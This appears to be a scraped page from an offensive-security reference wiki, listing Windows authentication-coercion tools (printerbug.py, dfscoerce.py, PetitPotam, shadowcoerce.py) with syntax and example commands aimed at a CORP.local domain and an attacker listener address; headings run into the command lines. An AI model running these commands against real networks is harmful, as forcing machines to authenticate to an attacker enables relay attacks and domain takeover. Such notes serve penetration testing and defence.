Coercing
Printerbug.py
[[domain/]username[:password]@]<targetName> attackerhost
python3 printerbug.py CORP.local/[email protected] 192.168.102.1DFS Coerce (MS-DFSNM)
python3 dfscoerce.py -u Joe -d CORP.local 192.168.101.1 192.168.102.1PetitPotam (MS-EFSRPC)
//ShadowCoerce (MS-FSRVP)
python3 shadowcoerce.py -d "domain" -u "user" -p "password" LISTENER TARGETADCSCoercePotato
Links
Last updated